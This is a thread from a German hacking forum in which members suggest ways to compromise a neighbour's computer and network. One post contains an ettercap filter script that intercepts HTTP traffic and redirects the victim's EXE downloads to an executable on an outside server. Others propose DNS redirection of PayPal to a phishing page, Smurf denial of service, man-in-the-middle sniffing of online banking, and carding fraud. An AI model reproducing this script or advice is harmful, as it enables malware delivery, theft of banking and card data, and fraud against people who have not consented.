Ergebnis 1 bis 10 von 18

Hybrid-Darstellung

  1. #1
    Sobig Wurm
    Registriert seit
    30.03.2009
    Beiträge
    212

    Standard

    Zitat Zitat von Cheese Beitrag anzeigen
    man könnte auchnoch dns abfragen manipulieren um paypal auf ne phishing seite von dir umzuleiten oder sowas.
    Wie mache ich das?^^
    Naja ich hab vlt. bald Zugriff auf den Router, das kann auch nicht schlecht sein...

    nmap ist was?
    edit: google hilft^^ http://de.wikipedia.org/wiki/Nmap

  2. #2
    DateMake Dialer
    Registriert seit
    12.08.2008
    Beiträge
    105

    Standard

    wenn du kontrolle über sein system willst, könntest du einmal nessus + metasploit versuchen, oder du manipulierst gleich den ganzen traffic mit ettercap und ersetzt sämtliche downloadanfragen von exe dateien mit deinem server (und hoffst, dass er keinen verdacht schöpft^^):
    Code:
    # replace rmccurdy with your website
    # replace the url with what ever exe you like
    
    
    
    
    
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("keep-alive", "close" ");
    replace("Keep-Alive", "close" ");
    
    }
    
    
    
    if (ip.proto == TCP && search(DATA.data, ": application") ){
    # enable for logging log(DECODED.data, "/tmp/log.log");
    msg("found EXE\n");
    # "Win32" is the first part of the exe example:
    # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
    if (search(DATA.data, "Win32")) {
    msg("doing nothing\n");
    } else {
    replace("200 OK", "301 Moved Permanently
    Location: http://www.rmccurdy.com/scripts/quickclean.exe
    ");
    msg("redirect success\n");
    
    }
    }

  3. #3
    Oruv rh z Xrksvi Avatar von Atbash
    Registriert seit
    13.10.2008
    Beiträge
    104

    Standard

    Naja, wenn es ein größeres Netzwerk mit mehreren Rechnern ist, kannste jemanden mit einer Smurf-Attacke aus dem Netz DOSen.
    Ein wenig BlackHat-iger wäre ein Man-in-the-Middle-Angriff, um beispielsweise SSL-gesicherte OnlineBanking Aktivitäten auszuhorchen.

    ~~ Das soll keine Anleitung sein, sondern nur eine Aufzeigung der Möglichkeiten. ~~

    Grüße
    atbash
    [S] R34l L33t-H4(K3|2 bUDdY 4 m3

  4. #4
    Revolte! Avatar von onboard
    Registriert seit
    05.09.2009
    Beiträge
    112

    Standard

    Jetzt mal im Ernst: Warum so ein Aufwand um einen einzigen Computer (mit was auch immer) zu infizieren?

  5. #5
    Oruv rh z Xrksvi Avatar von Atbash
    Registriert seit
    13.10.2008
    Beiträge
    104

    Standard

    Das war ja nicht die Frage...
    Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!
    Einfach weil mans kann, oder weils Spaß macht.
    DoS find ich macht auch nicht viel Sinn, und trotzdem ist es für viele Leute einfach eine Genugtuung.
    Und beim MITM-Angriff stehen denke ich finanzielle Gründe im Vordergrund, oder vielleicht noch ein 'höheres' Ziel.
    Grüße
    atbash
    Geändert von Atbash (09.09.2009 um 08:07 Uhr)
    [S] R34l L33t-H4(K3|2 bUDdY 4 m3

  6. #6
    Revolte! Avatar von onboard
    Registriert seit
    05.09.2009
    Beiträge
    112

    Standard

    Zitat Zitat von Atbash Beitrag anzeigen
    Das war ja nicht die Frage...
    Das ist dasselbe, wie wenn man fragt zum Beispiel fragt, warum man sich eine Blind SQL injection in einem Pferdeforum antut?!
    Weil man den Dump von 'nem Pferdeforum genauso gut cracken kann wie den aus 'nem Gayforum?
    Ist doch scheiß egal mit welchem Thema sich das Board befasst, hauptsache die Userzahlen stimmen. Von daher kein überzeugendes Argument...

    Was du jetzt anstellen kannst:
    1. Du kannst kostenlos im Internet deines Nachbarn surfen!!!11einseinsölf
    2. Du kannst nach herzenslust Faken & Carden
    3. Be creative!

  7. #7
    Oruv rh z Xrksvi Avatar von Atbash
    Registriert seit
    13.10.2008
    Beiträge
    104

    Standard

    Ich wollte damit nur sagen, dass mir sehr wohl einige Dinge einfallen würde, die man ausser kostenlos Surfen noch machen kann. Das war ja quasi auch die Frage.
    Und ein MITM-Angriff würde, um Kreditkarteninformationen, oder Bankverbindungen rauszufinden schon lohnen. Ist halt aufwändig, aber ist doch scheiß egal, wenns uns nicht irgendwie jucken würde, wären wir alle nicht in dem board hier.
    Grüße
    atbash
    [S] R34l L33t-H4(K3|2 bUDdY 4 m3

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •